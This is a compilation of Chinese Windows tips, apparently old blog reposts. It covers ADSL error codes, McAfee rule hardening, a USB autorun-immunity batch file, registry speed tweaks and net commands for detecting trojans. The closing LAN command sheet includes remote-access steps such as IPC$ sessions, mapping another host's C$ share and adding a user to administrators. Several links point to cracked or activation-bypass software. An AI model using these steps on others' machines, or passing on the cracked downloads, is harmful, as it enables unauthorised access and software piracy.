原因:用户名和密码错误,ISP服务器故障

解决:使用正确的用户名和密码,并且使用正确的ISP账号格式(name@service),致电ISP询问。

Error 718

问题:验证用户名时远程计算机超时没有响应,断开连接

原因:ADSL ISP服务器故障

解决:致电ISP询问

Error 720

问题:拨号网络无法协调网络中服务器的协议设置

原因:ADSL ISP服务器故障,非正常关机造成网络协议出错

解决:致电ISP询问,删除所有网络组件重新安装网络。

Error 734

问题:PPP连接控制协议中止

原因:ADSL ISP服务器故障,非正常关机造成网络协议出错

解决:致电ISP询问,删除所有网络组件重新安装网络。

Error 738

问题:服务器不能分配IP地址

原因:ADSL ISP服务器故障,ADSL用户太多超过ISP所能提供的IP地址

解决:致电ISP询问

Error 797

问题:ADSL MODEM连接设备没有找到

原因:ADSL MODEM电源没有打开,网卡和ADSL MODEM的连接线出现问题,软件安装以后相应的协议没有正确邦定,在创立拨号连接时,建立了错误的空连接

解决:检查电源,连接线;检查网络属性,RasPPPoE相关的协议是否正确的安装并正确邦定(相关协议),检查网卡是否出现?号或!号,把它设置为Enable;检查拨号连接的属性,是否连接的设备使用了一个“ISDN channel-Adapter Name(xx)” 的设备,该设备为一个空设备,如果使用了取消它,并选择 正确的PPPoE设备代替它,或者重新创立拨号连接。

2000XP双系统启动问题

2000XP双系统启动问题

先装好了WindowsXP,然后再安装Windows 2000。开机后发现Windows XP的滚动条消失后,电脑即黑屏,无法进入登录画面。

其实,这个问题是因为当安装好Windows 2000后,某些系统文件从高版本变回低版本,因此导致Windows XP无法识别。解决这个问题很简单:从Windows XP安装光盘中将I386目录中的NTLDR、DOSNET.INF复制到C盘根目录下替换现有文件即可。

提示:安装多操作系统时,遵循Windows 98→Windows 2000→Windows XP→Windows 2003的顺序,就不会出现系统间互相“干扰”的问题。

一些电脑系统网址

工具地址

Windows优化大师 v6.0 Build 618 注册版
http://www.800down.com/view.asp?id=3924

windows多系统启动恢复工具
http://goldwww.51.net/gw_by_guymake.php

瑞星注册表修复工具
http://it.rising.com.cn/service/technology/RegClean_download.htm

流行病毒专杀工具(Spant)
http://www.spant.net/

Windows XP关机补丁
http://www.ku85.com/download/SoftView/SoftView_1002.html

“震荡波”专杀工具
http://db.kingsoft.com/download/3/113.shtml

震荡波补丁下载
http://www.cphot.com/Article_Show.asp?ArticleID=365

XP激活补丁
http://soft.ccsu.cn/SoftView/SoftView_443.html

黄山IE修复专家
下载地址:http://www.znmq.com/hs.exe

瑞星专杀工具免费下载:
http://it.rising.com.cn/service/technology/tool.htm

硬盘分区魔术师8.0初级教程
http://www.4bvip.com/Article_Show.asp?ArticleID=122

硬盘分区魔术师8.0
http://zp313.51.net/

Norton Antivirus 2004 简体中文免激活零售版(可能有时不能连接)
http://www.800down.com/view.asp?id=3766

DO it your self, Autorun Virus Immune batch

在微软的系统中,文件夹也是一种文件,只不过其属性特殊一点罢了。既然这样,按照微软的规定,在同一文件夹下不允许同名的文件或文件夹出现。所以,我们可以利用这个规定来自己建立一个名为Autorun.inf的文件夹来防范Autorun.inf病毒。

这种方法曾经有人提出来过,也有一定的效果。但是,可谓是“道高一尺,魔高一丈”。病毒也不是吃素的,在运行之前先检测有没有Autorun.inf文件或文件夹,有的话则先删除再进行传播。难道我们就没什么别的办法来治治这可恶的Autorun.inf病毒吗?当然不是,大家跟我来。 其实思路没变,只不过我们建立的Autorun.inf文件夹是无法删除的,而且不需要任何第三方软件,相当简单,但要在DOS下完成 。

>点击“开始→运行”
>在地址栏里输入CMD后回车
>再输入以下命令(每输一行请Enter,\后内容为程序说明):
cd\ f: \这里的f指的是优盘盘符
md Autorun.inf \这里的意思是新建一个名为Autorun.inf的文件夹
cd\Autorun.inf \这里的意思是进入Autorun.inf文件夹
md nokill\ \这一步是关键,建立了一个名为nokill.的文件夹,在命令里比nokill.多了.\,这样就使得Autorun.inf文件夹删不掉了,这一步在Windows下是无法完成的
到此为止,我们的免疫系统打造完毕,现在你试试Autorun.inf文件夹还能不能删除。方法很简单,但的确很使用,大家都赶紧行动起来吧!

Or follow the intruction below:

Sample:

@cd /d f:

@md autorun.inf

@cd autorun.inf

@md Immune..\

@cd ..

@attrib +s +h +r autorun.inf

@exit

Save in notepad, with exetension “.bat”. Double clik to run. Change the drive letter where your usb pen drive locate.

MCAFEE8.0 最全面的设定教学

讓有些朋友能手動新增MCAFEE8.0!企業版的一些規則 使用mcafee後,感覺它的監控真是沒得說,的確不錯的殺軟,不過對於新手來說可能設置麻煩了點,但如果只用預定設置的話就安全性低了點,也許很多朋友都是匯入現成的規則,本著DIY的想法,並且每個人都應該有他們自己獨特的設置,所以與大家分享咖啡的規則設置。 呵呵,我也是轉貼。規則有點多,並不是一定要全設,看自己的實際情況啦! 許多人對咖啡不瞭解。先對咖啡略為介紹。

咖啡是國際上三大殺軟之一,也是下載使用率最高的殺軟。它是迄今為止監控最靈敏的殺軟,也是監控最全面的殺軟。 下面是咖啡官方對咖啡殺軟的簡介: McAfee防毒軟件,除了操作介面更新外,也將該公司的WebScanX功能合在一起,增加了許多新功能! 除了幫你偵測和清除病毒,它還有VShield自動監視系統,會常駐在System Tray,當你從磁碟、網路上、E-mail夾文件中開啟文件時便會自動偵測文件的安全性,若文件內含病毒,便會立即警告,並作適當的處理,而且支持滑鼠右鍵的快速選單功能,並可使用密碼將個人的設定鎖住讓別人無法亂改你的設定。

本人強烈推薦 McAfee VirusScan 8.0i 中文企業版+Anti-Spyware 安裝咖啡注意事項:
1、在安裝時,時間選項裡,請選擇「永久」,不要選擇預訂一年之類。
2、第一次升級咖啡,會很慢,大約2~3小時才能完成。請耐心等待。以後病毒庫升級會很快,一般1~3分鐘搞定。目前咖啡1~3天升級一次。個別時,一天升級3次以上。 咖啡安裝完成了,先對咖啡進行一些設置。

1、訪問保護。雙擊訪問保護,打開訪問保護。出現連接阜阻擋,文件保護,報告,三個選項。
(1)、更改連接阜設置。預定連接阜阻擋全部勾選。 新增阻擋連接阜新規則。連接阜總共有65535個。好了,把1~65535連接阜全部進行設置。由於咖啡對連接阜的阻擋模式分為兩種:阻止入站,阻止出站,這樣,對1~65535連接阜進行設置,需要分為兩組。一組阻止通過1~65535連接阜入站,一組阻止通過1~65535連接阜出站。為了方便設置和檢視連接阜阻擋而影響的工作行程,可以這樣進行設置。1~1000,每隔100個連接阜設置一個規則,並進行規則標號。1000~10000,每隔 1000個連接阜設置一個規則,也進行規則標號。10000~65535設置成一個規則,同時進行標號。這樣設置好了,可以連網進行測試,怎麼樣,不能上網吧?當然別人也進不來了。好了,打開咖啡日誌,檢視那些工作行程被阻止,阻止的具體規則是哪些。比如,咖啡日誌標明,svchost.exe工作行程被新規則1阻止,好了,選中新規則1,點擊「編輯」,彈出對話框,在已排除工作行程裡,新增svchost.exe,好了。依次類推,將影響的工作行程新增進去。設置好了之後,可以上網了。這樣進行連接阜設置,可以阻擋99%的連接阜。那些通過連接阜出入的木馬幾乎沒戲了。 (2)、更改訪問保護設置。勾選所有預定設置。一一打開編輯,檢視每個規則設置情況,凡是能夠選擇「阻止並報告訪問嘗試」,一律選擇。——預定規則裡,許多都是警告模式,將它們更改(註:如果更改預定設置,請再三思量,否則出現意外情況,我不負責)。將遠端對exe、ocx等文件保護規則合併。但凡遠端操作,在創建文件、寫入文件、執行文件、讀取文件、刪除文件前全部打勾。
(3)、更改咖啡日誌路徑。放在其他盤裡。

2、有害程式策略。預定規則裡,都沒有勾選。將他們全部勾選。

3、給咖啡殺軟設置密碼。咖啡控制台——工具——用戶界面選項——密碼選項。選擇使用密碼保護下面所有專案。設置8位以上超強密碼。在用咖啡設置一系列規則之後,可以鎖定咖啡殺軟界面。這樣,別人不能再更改您對咖啡的設置了。

4、共享資源的保護。打開咖啡訪問保護——文件保護——共享資源,將它設置成阻止並報告訪問嘗試。這樣,共享資源就不能被別人共享了。

5、按訪問掃瞄程式設置。一般——掃瞄——將啟始區,關機時掃瞄軟碟去掉。 其他設置,自己看著辦吧。 上面是咖啡本身攜帶的一些規則。為了安全,可以進行更加嚴格的設置。

1、用咖啡殺軟來防止3721、網路豬、中文郵、百度搜霸、一搜等流氓軟件。 目前,3721、網路豬、中文郵、百度搜霸、一搜經常偷偷溜進您的電腦,而且難以卸載乾淨。用咖啡殺軟可以阻止它們進入。 打開咖啡殺軟訪問保護,創建如下幾個規則:
1、禁止在本機創建、寫入、執行、讀取3721任何內容;
2、禁止在本機創建、寫入、執行、讀取網路豬任何內容;
3、禁止在本機創建、寫入、執行、讀取中文郵任何內容;
4、禁止在本機創建、寫入、執行、讀取百度搜霸任何內容;
5、禁止在本機創建、寫入、執行、讀取一搜任何內容。 好了,3721、網路豬、中文郵、百度搜霸、一搜等流氓軟件沒有理由呆在您的電腦裡了。 附上部分設置方法。比如,防止3721的方法: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在本機創建、寫入、執行、讀取3721任何內容 阻擋對像:* 要阻擋的文件或文件名:**\3721*\** 要阻止的文件操作:在創建文件、寫入文件、執行文件、讀取文件前全部打勾 響應方式:阻止並報告訪問嘗試 偶安裝不少軟件都捆綁3721,當咖啡打開此規則時,3721只見到一個鬼影子——空的3721資料夾。

2、用咖啡殺軟來防止未知木馬病毒 我查了下相關資料,就目前來說,木馬、病毒基本都是三種類型的,exe、dll、vxd類型。好了,只要我們創建如下三種保護機制:
1、禁止在本機任何地方創建、寫入任何exe文件
2、禁止在本機任何地方創建、寫入任何dll文件
3、禁止在本機任何地方創建、寫入任何vxd文件 這樣,現在出現的各種木馬病毒是進不來的。當然,這條規則非常霸道,就是您更新咖啡病毒庫,對其他軟件進行升級,下載exe、dll、vxd類型文件,以及移動任何exe、dll、vxd類型文件也不可能了。所以,當您進行類似操作時,暫時取消此規則,等操作完成之後,再繼續使用。 部分規則創建如下所示: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在本機任何地方創建、寫入任何exe文件 阻擋對像:* 要阻擋的文件或文件名:**\*.exe 要阻止的文件操作:在創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試 其他的類似規則,參照設置即可。

3、阻擋肆意刪除文件的行為 現在出現許多刪除mp3格式的病毒。好了,為了杜絕此類事件發生,可以這樣做。打開咖啡訪問保護,創建如下規則:禁止刪除本機任何mp3文件。好了,那些病毒想刪除mp3是不可能的了。即便是您自己也刪不掉mp3了!除非解禁!為了杜絕類似刪除某些文件的病毒、木馬,好了。我們再創建一條規則:禁止刪除本機任何內容。好了,那些肆意刪除各種文件的病毒、木馬,根本起不了什麼作用。當然,如果這條規則起作用,您自己也不可能刪除任何東西了。當您自己需要刪除某些內容,暫時取消這條規則,等刪除操作完成了,再打開就是了。這條規則保護自己電腦不被別人刪除任何東西非常管用哦。而且別人莫名其妙的,他根本不會想到是咖啡在阻止刪除操作哦! 規則創建如下所示: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止刪除本機任何mp3文件 阻擋對像:* 要阻擋的文件或文件名:**\*.mp3 要阻止的文件操作:在刪除文件前打勾 響應方式:阻止並報告訪問嘗試 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止刪除本機任何內容 阻擋對像:* 要阻擋的文件或文件名:**\*\** 要阻止的文件操作:在刪除文件前打勾 響應方式:阻止並報告訪問嘗試 個人也可以使用類似方法保護任何一個文件不被刪除。比如rm文件等。自己照貓畫虎試試。

4、用咖啡殺軟保護註冊表。 目前許多木馬、病毒都喜歡在註冊表駐留。好了。我們用咖啡創建這樣一條規則。禁止對本機註冊表進行創建、寫入活動。好了。除非您同意,否則,註冊表是不會無緣無故的被修改的。包括安裝軟件在內,如果咖啡依然開啟這條規則,哈哈,軟件雖然安裝完了,註冊表裡卻沒有寫入什麼東西。雖然不少軟件需要寫入註冊表裡才成,可註冊表裡沒有被寫入也可以用的哦——不信的可以實驗下!當然,不寫入註冊表,軟件功能上會打折扣,尤其是殺軟、防火牆之類。我曾做過類似實驗。不讓反間諜軟件寫入註冊表裡,結果它只能查到間諜,卻不能清除間諜(查到間諜數量與反間諜軟件安裝時是否寫入註冊表無關)。對比一下金山、瑞星的註冊表監視功能,金山、瑞星簡直差遠了。他們對註冊表的監視不但煩人,而且意義不是很大。比如,安裝一個軟件,點擊阻止寫入註冊表,那您就一直點下去吧。十年也點不完。有什麼意義? 規則創建如下所示: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止對本機註冊表進行創建、寫入活動 阻擋對像:* 要阻擋的文件或文件名:**\*.reg 要阻止的文件操作:在創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試

5、用咖啡來保護主頁。 通過咖啡殺軟來防護瀏覽器主頁被修改完全可以。這樣不用在安裝其他軟件進行防護了。其他瀏覽器防護軟件不但佔用一定資源,而且效果不一定好。而咖啡防護效果相當理想。具體方法如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在本機創建/修改hosts文件 阻擋對像:IEXPLORE.EXE,或者* 要阻擋的文件或文件名:**\etc*\** 要阻止的文件操作:在創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 好了。惡意網站不能在更改您的主頁了。

6、阻止惡意腳本入侵。 打開咖啡殺軟訪問保護中文件保護規則,創建這樣一些規則:
1、禁止在本機任何地方讀取、執行、創建、寫入任何js文件
2、禁止在本機任何地方讀取、執行、創建、寫入任何vbs文件
3、禁止在本機任何地方讀取、執行、創建、寫入任何htm文件
4、禁止在本機任何地方讀取、執行、創建、寫入任何html文件 好了,惡意網站通過腳本而入侵本機的惡意代碼、木馬基本滾蛋了。 部分規則創建如下所示: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在本機任何地方讀取、執行、創建、寫入任何js文件 阻擋對像:* 要阻擋的文件或文件名:**\*.js 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試 其他的類似規則,參照設置即可。 當然,這樣有些嚴厲,可能妨礙上網,可以將這些規則修改為阻止創建、寫入即可。

7、用咖啡來防止插件入侵。 現在上網越來越不安全。惡意插件越來越多了。好了。我們用咖啡來對付他們。由於那些插件是綁架到Internet Explorer文件裡的,好了,我們用咖啡把Internet Explorer文件保護起來。 規則創建如下所示: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在Internet Explorer資料夾中進行創建寫入活動 阻擋對像:* 要阻擋的文件或文件名:**\Internet Explorer*\** 要阻止的文件操作:在創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試 好了,那些插件不能進來了。

8、防止黑客破壞活動。 目前,黑客越來越多,也越來越喜歡入侵個人主機。黑客入侵個人主機不外乎兩個原因:
1、煉手。學習怎麼入侵別人。
2、種植後門。控制他人。 好了。廢話少說。黑客入侵,很難阻擋。那對於入侵的黑客破壞行為如何進行阻擋呢?看咖啡的手段。我們用咖啡建立這樣的規則:禁止遠端行為對本機任何文件/資料夾進行任何操作。這樣,黑客即便入侵了您的主機,他所能做的還有什麼呢? 具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止遠端行為對本機任何文件/資料夾進行任何操作 阻擋對像:System:Remote 要阻擋的文件或文件名:**\*\** 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 如果還不放心,可以將系統盤裡每個根目錄資料夾都創建一個規則。禁止黑客對他們進行任何操作。具體就不一一列舉裡。這樣設置,除非黑客能破壞咖啡,或者黑客知道咖啡密碼,更改咖啡設置,才能進行進一步破壞活動。如果黑客想破壞咖啡,決非易事。用過咖啡的人知道,咖啡不能被退出工作行程,只會持續工作。當然黑客可以通過卸載咖啡來破壞,問題是,黑客進行遠端卸載,必定調用exe之類文件,而咖啡是不允許黑客遠端對exe之類文件進行任何操作的。偶使用咖啡不久,曾被一個黑客入侵,那時還不懂得設置如此嚴厲的規則,只是打開咖啡預定的對exe、dll文件保護規則,那個黑客都沒有幹成什麼。如果能建立這樣嚴厲的規則,黑客所能做的事情將會非常非常少哦。

9、防止程式執行。 咖啡具有強大的阻止功能,幾乎可以阻止任何一個程式執行。比如,tftp.exe這個程式,一般用戶是用不上的。可以用咖啡來阻止他執行。註:咖啡預定規則裡已經設置,就不列舉了。這個功能非常有用。如果某天,不想執行某個程式,可以參照這個規則,將那個程式終止。或者,某天中了木馬、病毒,又清除不掉,怎麼辦呢?這時咖啡這個功能就突顯出來了。將那個木馬、病毒程式用咖啡阻止起來即可。這樣,那個木馬不能執行也等於死悄悄了。

10、建立最嚴厲的規則。 在到黑客網站、破解基地、黃色網站去,往往難免中木馬。雖然我不去那些網站,但為了那些常去黑客網站、破解基地、黃色網站的人的安全,特意為其創建如下規則。禁止在本機進行任何創建、寫入、刪除活動。這樣,中招的幾率將會是0。 具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止在本機進行任何創建、寫入、刪除活動 阻擋對像:* 要阻擋的文件或文件名:**\*\** 要阻止的文件操作:在創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 由於這條規則非常嚴厲,建議只在黑客網站、破解基地、黃色網站瀏覽時開啟。這條規則會產生大量日誌,一分鐘往往就有幾百條詳細日誌,非常佔用空間。所以,移動咖啡日誌到其他盤非常重要。當然,這條規則,也適合那些對安全性非常高的人使用。

11、防止Cookies洩密個人隱私 某些網站或\和黑客,會利用Cookies竊取用戶訊息。好了。為了盡量杜絕此類事件,可以這樣做。用咖啡建立Cookies保護機制。 具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止對Cookies文件進行某些操作 阻擋對像:* 要阻擋的文件或文件名:**\Cookies*\** 要阻止的文件操作:在讀取文件、創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試 好了。通過Cookies洩密的個人隱私得到咖啡的保護了。當然,這樣設置在某些網站不合適宜。需要暫時取消這條規則。至於IE瀏覽器對Cookies的保護機制,不太好操作。用禁止,好多網站不能去。不禁止,又有危險。與咖啡相比,顯然咖啡更加人性化。希望大家喜歡。

12、使用咖啡來防護個人隱私文件。 這是利用咖啡具有強大的文件保護性能來實現的。許多人喜歡使用某些加密軟件對個人文件進行加密,起到防護作用。如果您使用咖啡,那完全可以利用咖啡來實現這個功能。而且防護效果非常理想。他人如果對咖啡不是非常熟悉,根本不會想到是一個殺軟來保護的。而且,咖啡防護文件,在他人讀取、打開文件時,根本不提密碼,也不提咖啡,只是提示:請確認磁碟沒有寫保護之類。對於一般人來說,還以為文件損毀了而打不開哈。哈哈。是否有些意思? 下面簡單介紹一下,如何實現這個功能。首先,請將您所有需要保護的個人文件都放在某個根目錄裡,比如,起名為,流星雨。然後將這個文件保護起來即可。 具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止對流星雨文件/資料夾進行任何操作 阻擋對像:* 要阻擋的文件或文件名:**\流星雨*\** 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 如果,您起其他文件名,參照設置即可。 好了,這樣,在咖啡防護下,任何人都不能打開、刪除這個文件了。只有當您暫時取消咖啡這條規則,才可以打開。 另外,別忘記需要先給咖啡設置8位數以上超強密碼哦。在防護期間,將咖啡界面鎖起來即可。 當然,個人來說,不會有什麼絕對機密文件。無非是不想讓他人看一些東東而已。所以,咖啡這個功能還是不錯的哦。希望大家喜歡。

13、使用咖啡來安全的保護共享資源 這是完全可以的。 許多個人喜歡將自己的某些資源放在網路上與人共享,但是在共享同時,也必然存在不安全因素。為了最大限度保護個人安全,咖啡可以擔當此重任。 咖啡具有強大的保護規則,完全可以做到這點。下面簡單介紹一下,如何實現安全共享資源。現在假定硬碟是四個分區:C、D、E、F,系統盤是C硬碟。您想共享您的E盤資源。那麼,您可以這樣做。使用咖啡殺軟建立這樣幾條規則:禁止遠端行為對C硬碟進行任何操作;禁止遠端行為對D盤進行任何操作;禁止遠端行為在E盤進行創建/寫入/刪除操作;禁止遠端行為對F盤進行任何操作。具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止遠端行為對C硬碟進行任何操作 阻擋對像:System:Remote 要阻擋的文件或文件名:C:\*\** 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止遠端行為對D盤進行任何操作 阻擋對像:System:Remote 要阻擋的文件或文件名:D:\*\** 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止遠端行為在E盤進行創建/寫入/刪除操作 禁止遠端行為對E盤進行任何操作 阻擋對像:System:Remote 要阻擋的文件或文件名:E:\*\** 要阻止的文件操作:在創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止遠端行為對F盤進行任何操作 阻擋對像:System:Remote 要阻擋的文件或文件名:F:\*\** 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件、刪除文件前打勾 響應方式:阻止並報告訪問嘗試 將上面規則進行設置之後,還需要用咖啡來保持現有共享資源。再打開咖啡控制台------訪問保護------資料夾保護------共享資源,勾選保持共享資源的現有訪問權限。再對咖啡設置15位數以上超強密碼,並鎖定咖啡界面。好了。利用咖啡來保護您的安全設置好了。如果您想共享U盤,也可以參照設置。 這些規則設置,也適合不少網站。不過需要稍微修改一下,才能更好的發揮作用。

14、限制電腦管理工具中重要管理工具的修改操作 電腦管理工具中有許多重要工具,比如,本機安全策略、分佈式文件系統、服務、電腦管理、組策略等等。這些操作在修改完成之後,一般不會輕易更改。為防止他人更改這些設置,可以將他們禁用。禁用的方法很多。這裡主要談談,通過咖啡殺軟來如何實現這個功能。由於本機安全策略、分佈式文件系統、服務、電腦管理、路由和遠端訪問、事件檢視器、性能、遠端桌面、證書頒發機構、終端服務配置、元件服務、組策略等等都通過調用mmc.exe來進行操作的,所以可以利用這個共同點,來實現對他們的禁用。規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:限制電腦管理工具中重要管理工具的修改操作 阻擋對像:* 要阻擋的文件或文件名:**\mmc.exe 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試 通過這個設置,可以將Microsoft .NET Framework配置、本機安全策略、分佈式文件系統、服務、電腦管理、路由和遠端訪問、事件檢視器、性能、遠端桌面、證書頒發機構、終端服務配置、元件服務、組策略、設備管理器、控制台等幾十個重要工具,保護起來,拒絕他人進行修改操作。當咖啡這條規則啟用時,對這些管理工具進行修改操作時,會被提示沒有權限進行操作(即便您使用Administrators登入,也一樣沒有權限進行修改)。若當您進行類似操作時,請打開咖啡,暫時取消這條規則即可。當然,給咖啡設置密碼是必不可少的哦。

15、封鎖QQ等聊天軟件 封鎖QQ是讓網路管理員、公司老闆(既要自己可以使用,又要不讓他人使用QQ)頭疼的工作,以往我們還可以通過封鎖UDP的4000等連接阜來實現,不過自從TENCENT開闢了QQ的TCP/IP協議登入功能,封殺QQ變得更加困難。只要能上網,能夠使用瀏覽器瀏覽網頁就能上QQ。QQ使網路管理、公司老闆變得更加煩瑣。如果您使用咖啡企業版,那您可以用咖啡來徹底封殺QQ了。方法很簡單,用咖啡來阻止QQ用行即可。具體規則設置如下: 咖啡控制台------訪問保護------資料夾保護-----新增 規則名稱:禁止QQ執行 阻擋對像:* 要阻擋的文件或文件名:**\QQ.exe 要阻止的文件操作:在讀取文件、執行文件、創建文件、寫入文件前打勾 響應方式:阻止並報告訪問嘗試

Software Prefecth! make Windows software load faster!

Adding the /prefetch:1 switch to the executable startup path of a frequently used program will decrease the applications start up time. Example: I use Windows Messenger quite alot. In the Target: field of the Messenger properties add /prefetch:1 to the end of the path as shown below. "I:\Program Files\Messenger\msmsgs.exe" /prefetch:1 The result is a faster loading program as the switch automatically tells Windows to look to the Prefetch directory. You can also speed up explorer by opening the registry and drilling down to: HKEY_CLASSES_ROOT\Folder\shell\explore\command and adding the /prefetch:1 switch to the end of the Default value path %SystemRoot%\Explorer.exe /e,/idlist,%I,%L /prefetch:1 The same can be done for HKEY_CLASSES_ROOT\Folder\shell\open\command %SystemRoot%\Explorer.exe /idlist,%I,%L /prefetch:1

加快网页打开速度

我试过多次,只有这种方法能加快网页打开速度!尤其是打开图片较多的网页, 使用我这个方法前和使用后打开网页速度完全不一样! 但要说明一点的是:只是开始速度快多了,几分钟后, 速度也会下降,实际上这就够了!就象你上一辆拥挤的公交车, 如果你位置站得好,你会很容易上车的,而其他人就难了, 甚至上不了车!网速慢的朋友应该碰到过有的网页连附加码都无法显示的情况, 如果用这个方法就会立竿见影! 试试吧,你会感到惊喜的!!      方法如下:(如果不相信你可以先备份注册表,我个人多次经验,觉得没这个必要!) 运行“regedit”,以打开“注册表管理器”;然后,按以下路径找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters 右击“Parameters”子键右边相对应的空白处,选择“新建”→“DWORD值”,将其命名为“DefaultTTL”,然后,右击鼠标选择“修改”,在弹出的窗口中修改其值为“80”(十六进制)或128(十进制)。 再依次新建以下“DWORD值”,并且修改其数值(如有两值,则前者为十六进制,后者为十进制): EnablePMTUBHDetect = 0 EnablePMTUDiscovery =1 GlobalMaxTcpWindowSize = 7FFF 或 32767 (我是修改为372300,后面同此设置) TcpMaxDupAcks = 2 SackOpts = 1 Tcp1323Opts = 1 TcpWindowSize =7FFF 或 32767 (93440或186880或372300,视网络情况而定) 然后保存修改,重新启动电脑,就可以享受更高的网络速度所带来的乐趣了 。

检查电脑是否被安装木马三个命令

检查电脑是否被安装木马三个命令 一、检测网络连接   如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用Windows自带的网络命令来看看谁在连接你的计算机。   具体的命令格式是:netstat -an这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息,我们就可以完全监控计算机上的连接,从而达到控制计算机的目的。 二、禁用不明服务   很多朋友在某天系统重新启动后会发现计算机速度变慢了,不管怎么优化都慢,用杀毒软件也查不出问题,这个时候很可能是别人通过入侵你的计算机后给你开放了特别的某种服务,比如IIS信息服务等,这样你的杀毒软件是查不出来的。但是别急,可以通过“netstart”来查看系统中究竟有什么服务在开启,如果发现了不是自己开放的服务,我们就可以有针对性地禁用这个服务了。   方法就是直接输入“net start”来查看服务,再用“net stop server”来禁止服务。 三、轻松检查账户   很长一段时间,恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户,但这个账户是不经常用的,然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。恶意的攻击者可以通过这个账户任意地控制你的计算机。   为了避免这种情况,可以用很简单的方法对账户进行检测。   首先在命令行下输入net user,查看计算机上有些什么用户,然后再使用“net user+用户名”查看这个用户是属于什么权限的,一般除了Administrator是administrators组的,其他都不是!如果你发现一个系统内置的用户是属于administrators组的,那几乎肯定你被入侵了,而且别人在你的计算机上克隆了账户。快使用“net user用户名/del”来删掉这个用户吧!   联网状态下的客户端。对于没有联网的客户端,当其联网之后也会在第一时间内收到更新信息将病毒特征库更新到最新版本。不仅省去了用户去手动更新的烦琐过程,也使用户的计算机时刻处于最佳的保护环境之下

局域网dos命令集

net view PING一下就可以看到局域网内的所有的机器。 局域网dos命令集 net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C:到本地为H: net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ping ip(或域名) 